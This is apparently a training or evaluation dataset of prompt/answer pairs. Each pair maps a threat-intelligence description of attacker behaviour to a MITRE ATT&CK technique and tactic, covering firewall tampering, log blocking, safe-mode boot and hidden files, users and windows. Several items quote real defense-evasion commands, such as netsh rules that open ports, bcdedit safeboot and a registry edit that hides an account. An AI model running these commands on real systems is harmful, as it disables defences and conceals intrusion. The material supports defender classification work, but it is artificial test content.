+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used `netsh` to configure firewall rules that limited certain UDP outbound packets.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak may use netsh to add local firewall rule exceptions.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has been observed disabling the system firewall.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Various Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable it entirely using netsh.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has added the following rule to a victim's Windows firewall to allow RDP traffic - `""netsh"" advfirewall firewall add rule name=""Terminal Server"" dir=in action=allow protocol=TCP localport=3389`.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has disabled iptables.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prior to executing a backdoor ToddyCat has run `cmd /c start /b netsh advfirewall firewall add rule name=""SGAccessInboundRule"" dir=in protocol=udp action=allow localport=49683` to allow the targeted system to receive UDP packets on port 49683.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ""ZR"" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL disables the Windows firewall before binding to a port.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has checked for the presence of ""Little Snitch"", macOS network monitoring and application firewall software, stopping and exiting if it is found.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can modify the Linux iptables firewall to enable C2 communication on network devices via a stored list of port numbers.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can disable Security Center functions like the Windows Firewall.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 kills and disables services for Windows Firewall.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HARDRAIN opens the Windows Firewall to modify incoming connections.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has modified the firewall using netsh.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has a command to disable routing and the Firewall on the victim’s machine.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can modify the victim's firewall.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines.","Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can open the Windows Firewall on the victim’s machine to allow incoming connections.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can disable the firewall by modifying the registry key HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: netsh can be used to disable local firewall settings.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has modified the Windows firewall to allow itself to communicate through the firewall.,"Tecnique: T1562.004 Impair Defenses: Disable or Modify System Firewall, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 developed a custom injector that enables an Event Tracing for Windows (ETW) bypass, making malicious processes invisible to Windows logging.","Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to prevent certain log events from occurring.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to hide memory artifacts and to patch Event Tracing for Windows (ETW) and the Anti Malware Scan Interface (AMSI).,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can hook logging functions so that nothing from the backdoor gets sent to the logging facility.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HUI Loader has the ability to disable Windows Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) functions.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to set the `HKLM:\SYSTEM\\CurrentControlSet\\Control\\CrashControl\CrashDumpEnabled` Registry key to `0` in order to disable crash dumps.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can hook the ZwOpenProcess and GetExtendedTcpTable APIs called by the process of a security product to hide PIDs and TCP records from detection.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has suppressed all error reporting by calling `SetErrorMode` with 0x8007 as a parameter.,"Tecnique: T1562.006 Impair Defenses: Indicator Blocking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can allowlist IP addresses in AWS GuardDuty.,"Tecnique: T1562.007 Impair Defenses: Disable or Modify Cloud Firewall, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has disabled Purview Audit on targeted accounts prior to stealing emails from Microsoft 365 tenants.,"Tecnique: T1562.008 Impair Defenses: Disable or Modify Cloud Logs, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can disable or otherwise restrict various AWS logging services, such as AWS CloudTrail and VPC flow logs.","Tecnique: T1562.008 Impair Defenses: Disable or Modify Cloud Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker can restart a compromised machine in safe mode.,"Tecnique: T1562.009 Impair Defenses: Safe Mode Boot, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can reboot victim machines in safe mode with networking via `bcdedit /set safeboot network`.,"Tecnique: T1562.009 Impair Defenses: Safe Mode Boot, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can force a reboot in safe mode with networking.,"Tecnique: T1562.009 Impair Defenses: Safe Mode Boot, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has targeted victims with remote administration tools including RDP.,"Tecnique: T1563.002 Remote Service Session Hijacking: RDP Hijacking, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.,"Tecnique: T1563.002 Remote Service Session Hijacking: RDP Hijacking, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore uses the mktemp utility to make unique file and directory names for payloads, such as TMP_DIR=`mktemp -d -t x.","Tecnique: T1564 Hide Artifacts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has used `%HiddenReg%` and `%HiddenKey%` as part of its persistence via the Windows registry.,"Tecnique: T1564 Hide Artifacts, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=""$(mktemp -d /tmp/XXXXXXXXXXXX)"" or mktemp -t Installer.","Tecnique: T1564 Hide Artifacts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask is able to create “hidden” scheduled tasks by deleting the Security Descriptor (`SD`) registry value.,"Tecnique: T1564 Hide Artifacts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through `IFileOperation`.,"Tecnique: T1564 Hide Artifacts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has saved files with hidden file attributes.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's macOS backdoor hides the clientID file via a chflags function.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has created hidden files and folders within a compromised Linux system `/tmp` directory. FIN13 also has used `attrib.exe` to hide gathered local host information.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has hidden files on a compromised host.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malware to store malicious binaries in hidden directories on victim's USB drives.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda's PlugX variant has created a hidden folder on USB drives named RECYCLE.BIN to store malicious executables and collected data.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke downloaded a file ""libprocesshider"", which could hide files on the target system.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe can hide legitimate directories and replace them with malicious copies of the same name.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has created a hidden directory under C:\ProgramData\Apple\Updates\ and C:\Users\Public\Documents\Flash\.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has created hidden folders.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to set folders or files to be hidden from the Windows Explorer default view.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER creates and installs itself to a hidden installation directory.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has created a hidden file in the Startup folder of the current user.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to set its file attributes to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.[random string]/[random string].","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls has had its payload named with a dot prefix to make it hidden from view in the Finder application.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate initial installation involves dropping several files to a hidden directory named after the victim machine name.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can use hidden directories and files to hide malicious executables.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has commonly set file and path attributes to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly saves itself with a leading ""."" to make it a hidden file.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can create hidden system directories.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe sets its own executable file's attributes to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Komplex payload is stored in a hidden directory at /Users/Shared/.local/kextd.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to copy itself to a hidden file and directory.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to ""hidden"".","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy stores itself in ~/Library/.DS_Stores/,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can copy itself to and launch itself from hidden folders.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D sets the main loader file’s attributes to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can modify the characteristics of folders to hide them from the compromised user.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to hide and unhide files.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has placed its payload in hidden subdirectories.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT has the ability to set file attributes to ""hidden"" to hide files from the compromised user's view in Windows File Explorer.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can modify file attributes to hide files.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has been created with a hidden attribute to insure it's not visible to the victim.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has the ability to set file attributes to hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest hides a copy of itself in the user's ~/Library directory by using a . at the beginning of the file name followed by 9 random characters.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses attrib +h to make some of its files hidden.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker has copied a random file from the Windows System32 folder to the %APPDATA% location under a different hidden filename.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses a hidden folder named .xcassets and .git to embed itself in Xcode.,"Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten saves itself with a leading ""."" so that it's hidden from users by default.","Tecnique: T1564.001 Hide Artifacts: Hidden Files and Directories, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has modified the Registry to hide created user accounts.,"Tecnique: T1564.002 Hide Artifacts: Hidden Users, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has run reg add ‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList’ /v to hide a newly created user.,"Tecnique: T1564.002 Hide Artifacts: Hidden Users, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has modified the Registry to hide created user accounts from the Windows logon screen.,"Tecnique: T1564.002 Hide Artifacts: Hidden Users, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used the WindowStyle parameter to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to use -WindowStyle Hidden to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used the WindowStyle parameter to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens has used -w hidden and -windowstyle hidden to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus has used -WindowStyle Hidden to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used hidcon to run batch files in a hidden console window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group has used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used a payload that creates a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used an information gathering module that will hide an AV software window from the victim.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus executed PowerShell in a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has hidden malicious scripts using `powershell.exe -windowstyle hidden`.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has used ProcessWindowStyle.Hidden to hide windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth loads its module with the XSL script parameter vShow set to zero, which opens the application with a hidden window.","Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can hide the execution of scheduled tasks using `ProcessWindowStyle.Hidden`.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has hidden its console window by using the `ShowWindow` API function.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER uses -windowstyle hidden to conceal a PowerShell window that downloads a payload.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has executed hidden PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAMMERTOSS has used -WindowStyle hidden to conceal PowerShell windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
